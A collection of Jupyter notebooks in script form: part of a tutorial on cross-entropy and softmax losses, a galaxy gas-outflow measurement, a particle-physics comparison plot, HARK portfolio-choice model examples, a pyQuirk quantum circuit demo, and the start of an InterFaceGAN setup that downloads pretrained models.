# # The equivalent PyTorch code uses [torch.nn.BCELoss](https://pytorch.org/docs/stable/nn.html#bceloss): Xout = torch.ones(10) Y = torch.zeros(10) loss = torch.nn.BCELoss()(Xout, Y) # The cross entropy is inspired by information theory and closely related to the KL divergence we met [earlier](Variational.ipynb). With this approach, our assumptions are that: # - The target values in $Y_{tgt}$ are all either 0 or 1. # - The network output values in $X_{out}$ are continuous and $\phi_S(y^{out}_i)$ is interpreted as the corresponding probability that the output is 1. # # Note that *something* like the second assumption is necessary to reconcile the different domains of the data and prediction. # # With these assumptions, the likelihood is: # $$ # P(Y_\text{tgt}\mid X_\text{out}) = \begin{cases} # \phi_S(X_\text{out}) & Y_\text{tgt} = 1 \\ # 1 - \phi_S(X_\text{out}) & Y_\text{tgt} = 0 # \end{cases} # $$ # Take a minute to convince yourself that the following expression is equivalent (the case $\phi_S(X_\text{out}(\Theta)) = Y_\text{tgt} = 0$ requires some care since $0^0$ is indeterminate): # $$ # P(Y_\text{tgt}\mid X_\text{out}(\Theta)) = \left[\phi_S(X_\text{out}(\Theta))\right]^{Y_\text{tgt}}\, # \left[1 - \phi_S(X_\text{out}(\Theta))\right]^{1-Y_\text{tgt}} \; . # $$ # Using this form, you can show that the cross entropy loss equals the negative-log-likelihood of the $N$ samples of training data so optimizing BCE is equivalent to finding the ML point estimate of the network parameters under the assumptions above. # # For fixed training data, optimizing BCE is also equivalent to minimizing the KL divergence of the network's predicted discrete probability distribution with respect to the empirical discrete probability distribution of the training data. 
Therefore, training a binary classification network using the cross-entropy loss is effectively performing a variational inference (VI) to find the network probabilities that are closest to the empirical training probabilities. # #### Multi-category Classification Loss # How can we generalize the binary classification cross-entropy loss to problems with more than two categories? The usual approach is to increase the number of output nodes from 1 to the number of categories $C$, # but we can not directly interpret their values as category probabilities since there is no way to ensure that they sum to one. We could simply require that they are all non-negative and renormalize, but a more more robust approach is to convert the vector of output values $X_\text{out}$ to a corresponding vector of probabilities $\mathbf{p}$ for category $j = 1, 2, \ldots, C$ using the **softmax function**, # $$ # \mathbf{p}(X_\text{out}) \equiv \frac{1}{\sum_{k=1}^C\, \exp(X_\text{out}^k)}\, # [ \exp(X_\text{out}^1), \exp(X_\text{out}^2), \ldots, \exp(X_\text{out}^C) ] \; , # $$ # which works fine with positive or negative outputs $X_\text{out}^j$. Note that softmax generalizes the sigmoid function $\phi_S$ in the following sense: # $$ # \mathbf{p}([y_1, y_2]) = [\,\phi_S(y_1-y_2)\,,\, 1 - \phi_S(y_1-y_2)\,] \; . # $$ def softmax(y): # subtract out max(y) improve the numerical accuracy expy = np.exp(y - np.max(y)) return expy / expy.sum() softmax([2, -1, 3]) # The softmax function effectively implements a *winner takes all* policy, similar to the sigmoid activation $\phi_S$, as illustrated in the plot below where: # - the color scale indicates, from left to right, $p_1, p_2$ and $p_3$ for three categories, # - $y_1$ and $y_2$ are varied over the same range, and # - $y_3$ is fixed to the middle of this range. 
# + def plot_softmax(ylo, yhi, n=100): y_grid = np.linspace(ylo, yhi, n) y3 = 0.5 * (ylo + yhi) p_grid = np.array([softmax([y1, y2, y3]) for y1 in y_grid for y2 in y_grid]).reshape(n, n, 3) _, ax = plt.subplots(1, 3, figsize=(10.5, 3)) for k in range(3): ax[k].imshow(p_grid[:, :, k], interpolation='none', origin='lower', extent=[ylo, yhi, ylo, yhi]) ax[k].set_xlabel('$y_1$') ax[k].set_ylabel('$y_2$') if k != 0: ax[k].axvline(y3, c='gray', ls='--') if k != 1: ax[k].axhline(y3, c='gray', ls='--') if k != 2: ax[k].plot([ylo, yhi], [ylo, yhi], c='gray', ls='--') ax[k].grid(False) plot_softmax(0, 15) # - # The example above assumed output activations that can be large and positive, such as `relu` or `elu`. However, the strength of the *winner takes all* effect depends on how the outputs are scaled, and is relatively weak for output activations that saturate on both sides, such as `sigmoid` or `tanh`, which is why these are generally not used for classification outputs: plot_softmax(-1, +1) # Note that we assume **one-hot encoding** of the vector target values $\mathbf{y}^{out}$, which is not very efficient (unless using sparse-optimized data structures) compared to a single integer target value $y^{train} = 0, 1, \ldots, C-1$. However, sklearn has a [convenient utility](http://scikit-learn.org/stable/modules/generated/sklearn.preprocessing.OneHotEncoder.html) to convert integers to one-hot encoded vectors (use `sparse=True` to return vectors in an efficient [scipy sparse array](https://docs.scipy.org/doc/scipy/reference/sparse.html)).
notebooks/NeuralNetworks.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#       jupytext_version: 1.14.4
#   kernelspec:
#     display_name: 'Python 3.7.3 64-bit (''base'': conda)'
#     language: python
#     name: python37364bitbaseconda59fdcd74f7b646b8b675b4f21f43d693
# ---

# # Gas outflow rate of an isolated galaxy
#
# Measures the mass outflow rate through the planes |z| = H above and below
# the galactic plane in Gadget-style HDF5 snapshots, and compares against the
# rates produced by the Shimizu et al. (2019) pipeline.

import numpy as np
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
import h5py
import math
# NOTE(review): this alias shadows the builtin `int` for the rest of the
# notebook.  The builtin is not used in the cells visible here, but rename to
# e.g. `integrate` if a later cell ever needs `int(...)`.
import scipy.integrate as int
import numba

# +
time = 100  # number of snapshots in 0 -- 1 Gyr (one per 10 Myr)
H = 4  # height from galactic plane in kpc at which the outflow is measured
alpha = 3.1536e7/3.085677581e16  # 1 km/sec in kpc/yr

models = ["Osaka2019_isogal"]  #, "geodome_model/geodome_original"\
#, "geodome_model/ver_19.11.1"]

# Per-model, per-snapshot storage; filled by the loops below.
snapshot = [[0]*time for i in range(len(models))]
subfind = [[0]*time for i in range(len(models))]
MassOutFlowRate = [[0]*time for i in range(len(models))]
MassOutFlowRate_S19 = [[0]*time for i in range(len(models))]
MassOutFlowRate_r02 = [[0]*time for i in range(len(models))]
MassOutFlowRate_r05 = [[0]*time for i in range(len(models))]
MassOutFlowRate_r10 = [[0]*time for i in range(len(models))]
MassOutFlowRate_r20 = [[0]*time for i in range(len(models))]
SFR = [[0]*time for i in range(len(models))]

# Open every snapshot and its SUBFIND catalogue read-only.
# NOTE(review): handles stay open for the whole session, and the paths are
# machine-specific absolute paths.
for i in range(len(models)):
    for j in range(time):
        snapshot[i][j] = h5py.File('/home/oku/data_2019/isogal/{0}/snapshot_{1:03}/snapshot_{1:03}.hdf5'.format(models[i], j), 'r')
        subfind[i][j] = h5py.File('/home/oku/data_2019/isogal/{0}/snapshot_{1:03}/groups_{1:03}/sub_{1:03}.hdf5'.format(models[i], j), 'r')
# -

# ## Kernel function

# +
def W3(r, h):
    # Cubic-spline SPH kernel in 3D (normalisation 8/(pi h^3)); compact
    # support |r| < h, evaluated piecewise on the scaled radius r/h.
    r = abs(r)/h
    C = 8/h**3/math.pi
    if r > 1:
        return 0
    elif r > 1/2:
        return C*2*(1-r)**3
    else:
        return C*(1 - 6*r**2 + 6*r**3)

def func(x,h,z):
    # Integrand for the kernel's surface integral at height z: kernel value
    # times the circumference 2*pi*x of a ring at cylindrical radius x.
    return W3(math.sqrt(z**2 + x**2),h)*2*math.pi*x

def integral(hsml, z):
    # Surface integral of the kernel over the plane at height z; the kernel is
    # non-zero only inside cylindrical radius sqrt(hsml^2 - z^2).
    return int.quad(func, 0, math.sqrt(hsml**2 - z**2), args=(hsml, z))[0]

# Element-wise (vectorised) wrappers.  Note frompyfunc returns object arrays.
np_W3 = np.frompyfunc(W3,2,1)
np_int = np.frompyfunc(integral,2,1)
# -

# ## Gas outflow rate

@numba.jit
def main(Z, hsml, Vz, M, H):
    # Outflow rate through the planes z = +H and z = -H: for every particle
    # whose kernel overlaps a plane and which moves away from the mid-plane,
    # accumulate (kernel surface integral) * mass * |v_z|.
    # Z, hsml, Vz, M are per-particle arrays in the galaxy frame.
    dz = np.abs(np.abs(Z) - H)  # distance of the particle from its plane
    index_p = np.where((dz < hsml) & (Z > 0) & (Vz > 0))
    index_m = np.where((dz < hsml) & (Z < 0) & (Vz < 0))
    npdotM_m = np_int(hsml[index_m[0]], dz[index_m[0]])*M[index_m[0]]*np.abs(Vz[index_m[0]])
    npdotM_p = np_int(hsml[index_p[0]], dz[index_p[0]])*M[index_p[0]]*np.abs(Vz[index_p[0]])
    dotM = np.sum(npdotM_m) + np.sum(npdotM_p)
    return dotM

@numba.jit
def main_r(X, Y, Z, hsml, Vz, M, H, R):
    # Same as main(), restricted to particles within cylindrical radius R.
    dz = np.abs(np.abs(Z) - H)
    r = np.sqrt(X*X + Y*Y)
    index_p = np.where((dz < hsml) & (Z > 0) & (Vz > 0) & (r < R))
    index_m = np.where((dz < hsml) & (Z < 0) & (Vz < 0) & (r < R))
    npdotM_m = np_int(hsml[index_m[0]], dz[index_m[0]])*M[index_m[0]]*np.abs(Vz[index_m[0]])
    npdotM_p = np_int(hsml[index_p[0]], dz[index_p[0]])*M[index_p[0]]*np.abs(Vz[index_p[0]])
    dotM = np.sum(npdotM_m) + np.sum(npdotM_p)
    return dotM

@numba.jit
def main_S19(Z, hsml, Vz, M, density, H):
    # Shimizu et al. (2019)-style estimate: recentre Z on the density^2
    # weighted mid-plane, then approximate the kernel's surface integral by
    # W3(dz) * pi * (hsml^2 - dz^2) instead of integrating it exactly.
    # NOTE(review): the mid-plane cut here is Z <= 0 (vs Z < 0 in main) --
    # presumably intentional; verify against the reference implementation.
    rho_tot = sum(density*density)
    zcenter = sum(Z*density*density)
    zcenter = zcenter/rho_tot
    Z = Z-zcenter
    dz = np.abs(np.abs(Z) - H)
    index_p = np.where((dz < hsml) & (Z > 0) & (Vz > 0))
    index_m = np.where((dz < hsml) & (Z <= 0) & (Vz < 0))
    wk = np_W3(dz, hsml)
    area = math.pi*(hsml*hsml - dz*dz)  # disk area where the kernel meets the plane
    rho = M*wk
    npdotM = rho*np.abs(Vz)*area
    dotM = np.sum(npdotM[index_m[0]]) + np.sum(npdotM[index_p[0]])
    return dotM

# Loop over models and snapshots, computing every outflow-rate variant and the
# total star formation rate of the gas particles.
for k in range(len(models)):
    for t in range(time):
        # Galaxy centre (FoF group position) and bulk velocity (subhalo).
        GalPos = subfind[k][t]['Group/GroupPos'][0]
        GalVel = subfind[k][t]['Subhalo/SubhaloVel'][0]
        X = np.array(snapshot[k][t]['PartType0/Coordinates']).T[0]
        Y = np.array(snapshot[k][t]['PartType0/Coordinates']).T[1]
        Z = np.array(snapshot[k][t]['PartType0/Coordinates']).T[2]
        hsml = np.array(snapshot[k][t]['PartType0/SmoothingLength'])
        Vz = np.array(snapshot[k][t]['PartType0/Velocities']).T[2]
        M = np.array(snapshot[k][t]['PartType0/Masses'])
        density = np.array(snapshot[k][t]['PartType0/Density'])
        dotM = 0.0
        dotM_S19 = 0.0
        # main/main_r take galaxy-frame coordinates and velocities;
        # main_S19 does its own recentring from the density field.
        dotM = main(Z-GalPos[2], hsml, Vz-GalVel[2], M, H)
        dotM_S19 = main_S19(Z, hsml, Vz, M, density, H)
        dotM_r02 = main_r(X-GalPos[0], Y-GalPos[1], Z-GalPos[2], hsml, Vz-GalVel[2], M, H, 2)
        dotM_r05 = main_r(X-GalPos[0], Y-GalPos[1], Z-GalPos[2], hsml, Vz-GalVel[2], M, H, 5)
        dotM_r10 = main_r(X-GalPos[0], Y-GalPos[1], Z-GalPos[2], hsml, Vz-GalVel[2], M, H, 10)
        dotM_r20 = main_r(X-GalPos[0], Y-GalPos[1], Z-GalPos[2], hsml, Vz-GalVel[2], M, H, 20)
        # Convert to Msun/yr: 1e10 presumably rescales the code mass unit to
        # Msun (TODO confirm), alpha converts km/s to kpc/yr.
        MassOutFlowRate[k][t] = dotM*1e10*alpha
        MassOutFlowRate_S19[k][t] = dotM_S19*1e10*alpha
        MassOutFlowRate_r02[k][t] = dotM_r02*1e10*alpha
        MassOutFlowRate_r05[k][t] = dotM_r05*1e10*alpha
        MassOutFlowRate_r10[k][t] = dotM_r10*1e10*alpha
        MassOutFlowRate_r20[k][t] = dotM_r20*1e10*alpha
        SFR[k][t] = np.sum(np.array(snapshot[k][t]['PartType0/StarFormationRate']))
#         print("t {}, dotM {}, dotM_approx {}".format(t, dotM, dotM_approx))

# Dependence of the outflow rate on the cylindrical aperture radius R.
timestep = np.linspace(0,0.99,100)
plt.plot(timestep,MassOutFlowRate_r02[0], label="R = 2kpc")
plt.plot(timestep,MassOutFlowRate_r05[0], label="R = 5kpc")
plt.plot(timestep,MassOutFlowRate_r10[0], label="R = 10kpc")
plt.plot(timestep,MassOutFlowRate_r20[0], label="R = 20kpc")
plt.plot(timestep,MassOutFlowRate[0], label=r"R = $\infty$")
plt.yscale('log')
plt.ylabel('Mass outflow rate [Msun/yr]')
plt.xlabel('Time [Gyr]')
plt.legend(bbox_to_anchor=(1, 0), loc='lower right')
# plt.savefig("OutflowRate4kpc_R.pdf")

# Comparison of the Shimizu19-style estimate (with and without the sqrt(t)
# scaling) against the exact kernel-integral measurement.
timestep = np.linspace(0,0.99,100)
plt.plot(timestep,np.array(MassOutFlowRate_S19[0])*np.sqrt(timestep), label="Shimizu et al. (2019)")
plt.plot(timestep,MassOutFlowRate_S19[0], linestyle="dashed", label=r"$\sqrt{t/1\,{\rm Gyr}}$ fixed")
plt.plot(timestep,MassOutFlowRate[0], linestyle="dotted", label=r"$\sqrt{t/1\,{\rm Gyr}}$ fixed & Eq. (2)")
plt.yscale('log')
plt.ylabel('Mass outflow rate [Msun/yr]')
plt.xlabel('Time [Gyr]')
plt.legend(bbox_to_anchor=(1, 0), loc='lower right')
#plt.savefig("OutflowRate4kpc.pdf")

# +
# Reference results produced by the Shimizu19 code for the same height H.
data = [0]*len(models)
for i in range(len(models)):
    data[i] = np.loadtxt('/home/oku/data_2019/isogal/{}/data/{}'.format(models[i], H))

for i in range(len(models)):
    plt.plot(MassOutFlowRate[i],linestyle="dashed",label="{} my code (my method)".format(models[i]))
    plt.plot(MassOutFlowRate_S19[i],label="{} my code (Shimizu19 method)".format(models[i]))
    plt.plot(data[i].T[2],linestyle="dotted", label="{} Shimizu19 code".format(models[i]))
plt.yscale('log')
plt.ylabel('Mass outflow rate [Msun/yr]')
plt.xlabel('time [10Myr]')
plt.legend(bbox_to_anchor=(1, 0), loc='lower left')
# plt.savefig('OutFlowRate4kpc.pdf',bbox_inches="tight")
# -

# Mass loading factor = outflow rate / star formation rate.
for i in range(len(models)):
    plt.plot(np.array(MassOutFlowRate[i])/np.array(SFR[i]),linestyle="dashed",label="{} my code (my method)".format(models[i]))
    plt.plot(np.array(MassOutFlowRate_S19[i])/np.array(SFR[i]),label="{} my code (Shimizu19 method)".format(models[i]))
    plt.plot(data[i].T[1],linestyle="dotted", label="{} Shimizu19 code".format(models[i]))
plt.yscale('log')
plt.ylabel('Mass loading factor')
plt.xlabel('time [10Myr]')
plt.legend(bbox_to_anchor=(1, 0), loc='lower left')
# plt.savefig("MassLoadingFactor4kpc.pdf",bbox_inches="tight")

# Sanity check: the SFR history should agree between the two pipelines.
plt.plot(SFR[0], label="my code")
plt.plot(data[0].T[3],label="Shimizu19 code")
plt.ylabel('SFR')
plt.xlabel('time')
plt.grid()
plt.legend()
# plt.savefig("SFR.pdf")
OutflowRate.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#       jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

import pandas as pd
import numpy as np
from matplotlib import pyplot as plt
import math
import os

# +
# Read the ALICE measurement and the Trento model prediction.
# Both files are tab-separated with no header row, so column names are
# supplied explicitly.
measured = pd.read_csv(
    "C:\\Users\\LPO\\Desktop\\vyzkumak\\dndeta_exp.dat",
    sep="\t",
    header=None,
    names=["rap", "rap_max", "rap_min","dndeta","chyba","chybaminus"],
)
predicted = pd.read_csv(
    "C:\\Users\\LPO\\Desktop\\vyzkumak\\dndeta.dat",
    sep="\t",
    header=None,
    names=["rap","dndeta"],
)

# +
# Overlay the measured dN/deta points (with error bars) and the model points.
fig, ax = plt.subplots(sharex=True, figsize=(9,8))

ax.errorbar(
    measured["rap"],
    measured["dndeta"],
    yerr=(measured["chyba"]),
    fmt='o',
    ecolor='r',
    color='black',
    elinewidth=2,
    capsize=4,
    label="CERN ALICE data",
)
ax.plot(predicted["rap"], predicted["dndeta"], 'o', color='darkcyan', label="Trento IS Pb-Pb 2.76TeV 20-30%")

ax.grid(True)
ax.set_xlim([-6, 6])
ax.set_ylim([0, 900])
ax.set_xlabel('$\eta$',fontsize=15)
ax.set_ylabel('$ \dfrac{dN}{d\eta}$',fontsize=15)
ax.legend(loc=2,fontsize=12)
# -
dndeta-checkpoint.ipynb
'''
Example implementations of HARK.ConsumptionSaving.ConsPortfolioModel
'''
from HARK.ConsumptionSaving.ConsPortfolioModel import PortfolioConsumerType, init_portfolio
from HARK.ConsumptionSaving.ConsIndShockModel import init_lifecycle
from HARK.utilities import plotFuncs
from copy import copy
from time import time
import numpy as np
import matplotlib.pyplot as plt

# Make and solve an example portfolio choice consumer type
print('Now solving an example portfolio choice problem; this might take a moment...')
MyType = PortfolioConsumerType()
MyType.cycles = 0  # cycles = 0 -> infinite-horizon problem
t0 = time()
MyType.solve()
t1 = time()
# Collect the per-period consumption and risky-share policy functions
# (the "Adj" solutions: the agent is free to adjust the portfolio).
MyType.cFunc = [MyType.solution[t].cFuncAdj for t in range(MyType.T_cycle)]
MyType.ShareFunc = [MyType.solution[t].ShareFuncAdj for t in range(MyType.T_cycle)]
print('Solving an infinite horizon portfolio choice problem took ' + str(t1-t0) + ' seconds.')

# Compute the Merton-Samuelson limiting portfolio share when returns are lognormal
MyType.RiskyVar = MyType.RiskyStd**2
MyType.RiskPrem = MyType.RiskyAvg - MyType.Rfree
def RiskyShareMertSamLogNormal(RiskPrem,CRRA,RiskyVar):
    """Merton-Samuelson analytical limiting risky share: equity premium
    divided by (relative risk aversion * return variance)."""
    return RiskPrem/(CRRA*RiskyVar)

# Plot the consumption and risky-share functions
print('Consumption function over market resources:')
plotFuncs(MyType.cFunc[0], 0., 20.)
print('Risky asset share as a function of market resources:')
print('Optimal (blue) versus Theoretical Limit (orange)')
plt.xlabel('Normalized Market Resources')
plt.ylabel('Portfolio Share')
plt.ylim(0.0,1.0)
# Since we are using a discretization of the lognormal distribution,
# the limit is numerically computed and slightly different from
# the analytical limit obtained by Merton and Samuelson for infinite wealth
plotFuncs([MyType.ShareFunc[0]
#           ,lambda m: RiskyShareMertSamLogNormal(MyType.RiskPrem,MyType.CRRA,MyType.RiskyVar)*np.ones_like(m)
            ,lambda m: MyType.ShareLimit*np.ones_like(m)
           ]
           , 0., 200.)

# Now simulate this consumer type
MyType.track_vars = ['cNrmNow', 'aNrmNow', 't_age']
MyType.T_sim = 100
MyType.initializeSim()
MyType.simulate()

print('\n\n\n')
print('For derivation of the numerical limiting portfolio share')
print('as market resources approach infinity, see')
print('http://www.econ2.jhu.edu/people/ccarroll/public/lecturenotes/AssetPricing/Portfolio-CRRA/')

# Bare "" strings below act as jupytext cell separators.
""
# Make another example type, but this one optimizes risky portfolio share only
# on the discrete grid of values implicitly chosen by RiskyCount, using explicit
# value maximization.
init_discrete_share = init_portfolio.copy()
init_discrete_share['DiscreteShareBool'] = True
init_discrete_share['vFuncBool'] = True # Have to actually construct value function for this to work

# Make and solve a discrete portfolio choice consumer type
print('Now solving a discrete choice portfolio problem; this might take a minute...')
DiscreteType = PortfolioConsumerType(**init_discrete_share)
DiscreteType.cycles = 0  # infinite horizon again
t0 = time()
DiscreteType.solve()
t1 = time()
DiscreteType.cFunc = [DiscreteType.solution[t].cFuncAdj for t in range(DiscreteType.T_cycle)]
DiscreteType.ShareFunc = [DiscreteType.solution[t].ShareFuncAdj for t in range(DiscreteType.T_cycle)]
print('Solving an infinite horizon discrete portfolio choice problem took ' + str(t1-t0) + ' seconds.')

# Plot the consumption and risky-share functions
print('Consumption function over market resources:')
plotFuncs(DiscreteType.cFunc[0], 0., 50.)
print('Risky asset share as a function of market resources:')
print('Optimal (blue) versus Theoretical Limit (orange)')
plt.xlabel('Normalized Market Resources')
plt.ylabel('Portfolio Share')
plt.ylim(0.0,1.0)
# Since we are using a discretization of the lognormal distribution,
# the limit is numerically computed and slightly different from
# the analytical limit obtained by Merton and Samuelson for infinite wealth
plotFuncs([DiscreteType.ShareFunc[0]
            ,lambda m: DiscreteType.ShareLimit*np.ones_like(m)
           ]
           , 0., 200.)

print('\n\n\n')

""
# Make another example type, but this one can only update their risky portfolio
# share in any particular period with 15% probability.
init_sticky_share = init_portfolio.copy()
init_sticky_share['AdjustPrb'] = 0.15

# Make and solve a discrete portfolio choice consumer type
print('Now solving a portfolio choice problem with "sticky" portfolio shares; this might take a moment...')
StickyType = PortfolioConsumerType(**init_sticky_share)
StickyType.cycles = 0
t0 = time()
StickyType.solve()
t1 = time()
# "Adj": policy when allowed to adjust; "Fxd": policy when stuck with the
# current share (a function of both resources and the fixed share).
StickyType.cFuncAdj = [StickyType.solution[t].cFuncAdj for t in range(StickyType.T_cycle)]
StickyType.cFuncFxd = [StickyType.solution[t].cFuncFxd for t in range(StickyType.T_cycle)]
StickyType.ShareFunc = [StickyType.solution[t].ShareFuncAdj for t in range(StickyType.T_cycle)]
print('Solving an infinite horizon sticky portfolio choice problem took ' + str(t1-t0) + ' seconds.')

# Plot the consumption and risky-share functions
print('Consumption function over market resources when the agent can adjust his portfolio:')
plotFuncs(StickyType.cFuncAdj[0], 0., 50.)

print("Consumption function over market resources when the agent CAN'T adjust, by current share:")
M = np.linspace(0., 50., 200)
# One consumption curve per fixed share in {0.0, 0.05, ..., 1.0}.
for s in np.linspace(0.,1.,21):
    C = StickyType.cFuncFxd[0](M, s*np.ones_like(M))
    plt.plot(M,C)
plt.xlim(0.,50.)
plt.ylim(0.,None)
plt.show()

print('Risky asset share function over market resources (when possible to adjust):')
print('Optimal (blue) versus Theoretical Limit (orange)')
plt.xlabel('Normalized Market Resources')
plt.ylabel('Portfolio Share')
plt.ylim(0.0,1.0)
plotFuncs([StickyType.ShareFunc[0]
            ,lambda m: StickyType.ShareLimit*np.ones_like(m)
           ]
           , 0., 200.)

""
# Make another example type, but this one has *age-varying* perceptions of risky asset returns.
# Begin by making a lifecycle dictionary, but adjusted for the portfolio choice model.
# Build a lifecycle calibration that borrows the portfolio-specific grid and
# preference settings from init_portfolio, then overlays age-varying beliefs
# about the risky return (constant mean, rising standard deviation with age).
init_age_varying_risk_perceptions = copy(init_lifecycle)
init_age_varying_risk_perceptions['RiskyCount'] = init_portfolio['RiskyCount']
init_age_varying_risk_perceptions['ShareCount'] = init_portfolio['ShareCount']
init_age_varying_risk_perceptions['aXtraMax'] = init_portfolio['aXtraMax']
init_age_varying_risk_perceptions['aXtraCount'] = init_portfolio['aXtraCount']
init_age_varying_risk_perceptions['aXtraNestFac'] = init_portfolio['aXtraNestFac']
init_age_varying_risk_perceptions['BoroCnstArt'] = init_portfolio['BoroCnstArt']
init_age_varying_risk_perceptions['CRRA'] = init_portfolio['CRRA']
init_age_varying_risk_perceptions['DiscFac'] = init_portfolio['DiscFac']

init_age_varying_risk_perceptions['RiskyAvg'] = 10*[1.08]  # perceived mean, one entry per period
init_age_varying_risk_perceptions['RiskyStd'] = [0.20,0.21,0.22,0.23,0.24,0.25,0.26,0.27,0.28,0.29]
init_age_varying_risk_perceptions['RiskyAvgTrue'] = 1.08  # actual return process
init_age_varying_risk_perceptions['RiskyStdTrue'] = 0.20
AgeVaryingRiskPercType = PortfolioConsumerType(**init_age_varying_risk_perceptions)
AgeVaryingRiskPercType.cycles = 1  # finite lifecycle: solve the sequence once

# Solve the agent type with age-varying risk perceptions
print('Now solving a portfolio choice problem with age-varying risk perceptions...')
t0 = time()
AgeVaryingRiskPercType.solve()
AgeVaryingRiskPercType.cFunc = [AgeVaryingRiskPercType.solution[t].cFuncAdj for t in range(AgeVaryingRiskPercType.T_cycle)]
AgeVaryingRiskPercType.ShareFunc = [AgeVaryingRiskPercType.solution[t].ShareFuncAdj for t in range(AgeVaryingRiskPercType.T_cycle)]
t1 = time()
print('Solving a ' + str(AgeVaryingRiskPercType.T_cycle) + ' period portfolio choice problem with age-varying risk perceptions took ' + str(t1-t0) + ' seconds.')

# Plot the consumption and risky-share functions
print('Consumption function over market resources in each lifecycle period:')
plotFuncs(AgeVaryingRiskPercType.cFunc, 0., 20.)
print('Risky asset share function over market resources in each lifecycle period:')
plotFuncs(AgeVaryingRiskPercType.ShareFunc, 0., 200.)

# The code below tests the mathematical limits of the model.

# +
import os

# Deterministic income profile, presumably following the CGM calibration —
# income is a polynomial in age.  Here are the coefficients:
a=-2.170042+2.700381
b1=0.16818
b2=-0.0323371/10
b3=0.0019704/100

time_params = {'Age_born': 0, 'Age_retire': 8, 'Age_death': 9}
t_start = time_params['Age_born']
t_ret = time_params['Age_retire'] # We are currently interpreting this as the last period of work
t_end = time_params['Age_death']

# They assume retirement income is a fraction of labor income in the
# last working period
repl_fac = 0.68212

# Compute average income at each point in (working) life
f = np.arange(t_start, t_ret+1,1)
f = a + b1*f + b2*(f**2) + b3*(f**3)
det_work_inc = np.exp(f)

# Retirement income
det_ret_inc = repl_fac*det_work_inc[-1]*np.ones(t_end - t_ret)

# Get a full vector of the deterministic part of income
det_income = np.concatenate((det_work_inc, det_ret_inc))

# ln Gamma_t+1 = ln f_t+1 - ln f_t
gr_fac = np.exp(np.diff(np.log(det_income)))

# Now we have growth factors for T_end-1 periods.

# Finally define the normalization factor used by CGM, for plots.
# ### IMPORTANT ###
# We adjust this normalization factor for what we believe is a typo in the
# original article. See the REMARK jupyter notebook for details.
# (np.exp(0) == 1, so the factor below is just det_income; the exp(0) is
# kept deliberately to mark where the original article's term was removed.)

norm_factor = det_income * np.exp(0)

# Create a grid of market resources for the plots
mMin = 0 # Minimum ratio of assets to income to plot
mMax = 1e4 # Maximum ratio of assets to income to plot
mPts = 1000 # Number of points to plot

eevalgrid = np.linspace(0,mMax,mPts) # range of values of assets for the plot

# Number of points that will be used to approximate the risky distribution
risky_count_grid = [5,50]

# %% Calibration and solution
for rcount in risky_count_grid:
    # Create a new dictionary and replace the number of points that
    # approximate the risky return distribution
    # Create new dictionary
    merton_dict = init_lifecycle.copy()
    merton_dict['RiskyCount'] = rcount

    # Create and solve agent
    agent = PortfolioConsumerType(**merton_dict)
    agent.solve()

    # Compute the analytical Merton-Samuelson limiting portfolio share
    RiskyVar = agent.RiskyStd**2
    RiskPrem = agent.RiskyAvg - agent.Rfree
    MS_limit = RiskyShareMertSamLogNormal(RiskPrem, agent.CRRA, RiskyVar)

    # Now compute the limiting share numerically, using the approximated
    # distribution
    agent.updateShareLimit()
    NU_limit = agent.ShareLimit

    # Plot by ages
    # NOTE(review): the loop variable `a` below shadows the income-polynomial
    # coefficient `a` defined above; harmless here because `f` was already
    # computed, but worth renaming.
    ages = [2, 4, 6, 8]
    age_born = time_params['Age_born']
    plt.figure()
    for a in ages:
        plt.plot(eevalgrid,
                 agent.solution[a-age_born]\
                 .ShareFuncAdj(eevalgrid/
                               norm_factor[a-age_born]),
                 label = 'Age = %i' %(a))
    plt.axhline(MS_limit, c='k', ls='--', label = 'M&S Limit')
    plt.axhline(NU_limit, c='k', ls='-.', label = 'Numer. Limit')
    plt.ylim(0,1.05)
    plt.xlim(eevalgrid[0],eevalgrid[-1])
    plt.legend()
    plt.title('Risky Portfolio Share by Age\n Risky distribution with {points} equiprobable points'.format(points = rcount))
    plt.xlabel('Wealth (m)')
    plt.ioff()
    plt.draw()
# -
examples/ConsumptionSaving/example_ConsPortfolioModel.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#       jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

from pyQuirk import Quirk

# Create the Quirk circuit widget and size its canvas.
viewer = Quirk()
viewer.width = 800
viewer.height = 300

# Display the (initially empty) widget inline.
viewer

# A three-qubit demo program: H + CNOT build a Bell pair on q0/q1,
# plus a Y gate on q2.
demo_program = """
OPENQASM 2.0;
include "qelib1.inc";
qreg q[3];
h q[0];
cx q[0],q[1];
y q[2];
"""

# Load the OpenQASM source into the displayed widget.
viewer.update_from_qasm(demo_program)
example.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#       jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     name: python3
# ---

# + [markdown] id="qJDJLE3v0HNr"
# # Fetch Codebase and Models

# + id="JqiWKjpFa0ov"
# Colab setup: clone the InterFaceGAN repo and download pretrained
# PGGAN/StyleGAN checkpoints (the "# !" lines are escaped notebook shell
# commands, executed only when run as a notebook).
import os
os.chdir('/content')
CODE_DIR = 'interfacegan'
# !git clone https://github.com/genforce/interfacegan.git $CODE_DIR
os.chdir(f'./{CODE_DIR}')
# !wget https://www.dropbox.com/s/t74z87pk3cf8ny7/pggan_celebahq.pth?dl=1 -O models/pretrain/pggan_celebahq.pth --quiet
# !wget https://www.dropbox.com/s/nmo2g3u0qt7x70m/stylegan_celebahq.pth?dl=1 -O models/pretrain/stylegan_celebahq.pth --quiet
# !wget https://www.dropbox.com/s/qyv37eaobnow7fu/stylegan_ffhq.pth?dl=1 -O models/pretrain/stylegan_ffhq.pth --quiet

# + [markdown] id="hQ_IXBZr8YcJ"
# # Define Utility Functions

# + id="ijKTlG5GeTd3"
import os.path
import io
import IPython.display
import numpy as np
import cv2
import PIL.Image
import torch

from models.model_settings import MODEL_POOL
from models.pggan_generator import PGGANGenerator
from models.stylegan_generator import StyleGANGenerator
from utils.manipulator import linear_interpolate


def build_generator(model_name):
    """Builds the generator by model name.

    model_name must be a key of MODEL_POOL; its 'gan_type' entry selects
    the wrapper class.
